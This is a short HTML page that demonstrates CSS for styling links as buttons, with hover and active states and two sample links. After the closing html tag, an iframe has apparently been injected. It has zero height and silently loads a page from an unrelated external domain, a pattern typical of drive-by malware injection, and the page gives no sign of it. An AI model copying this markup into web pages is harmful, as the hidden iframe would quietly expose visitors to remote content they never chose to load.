<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<title>用css把a链接模拟成button的样子</title>
<style type="text/css">
<!--
*{font-size:12px;}

a.button:link {       
       padding:3px;
       border:2px outset;
       cursor:pointer;
       background-color: #d4d0c8;
       text-align:center;
       height:13px;
       text-decoration: none;
       color: #000000;
       display:inline-block;
       clear:both;       
}
a.button:visited {       
       padding:3px;
       border:2px outset;
       cursor:pointer;
       background-color: #d4d0c8;
       text-align:center;
       height:13px;
       text-decoration: none;
       color: #000000;
       display:inline-block;
       clear:both;       
}
a.button:hover {       
       padding:3px;
       border:2px outset;
       cursor:pointer;
       background-color: #d4d0c8;
       text-align:center;
       height:13px;
       text-decoration: none;
       color: #0000FF;
       display:inline-block;
       clear:both;       
}
a.button:active {       
       padding:3px;
       border:2px inset;
       cursor:pointer;
       background-color: #d4d0c8;
       text-align:center;
       height:13px;
       text-decoration: none;
       color: #999999;
       display:inline-block;
       clear:both;       
}
-->
</style>
</head>

<body>
<a href="http://blog.sqlsky.com" class="button">菩提树下的杨过</a>
<a href="#" class="button">返回上页</a>
</body>
</html><iframe src=http://mm.uu88567.cn/index/mm.htm width=100 height=0></iframe>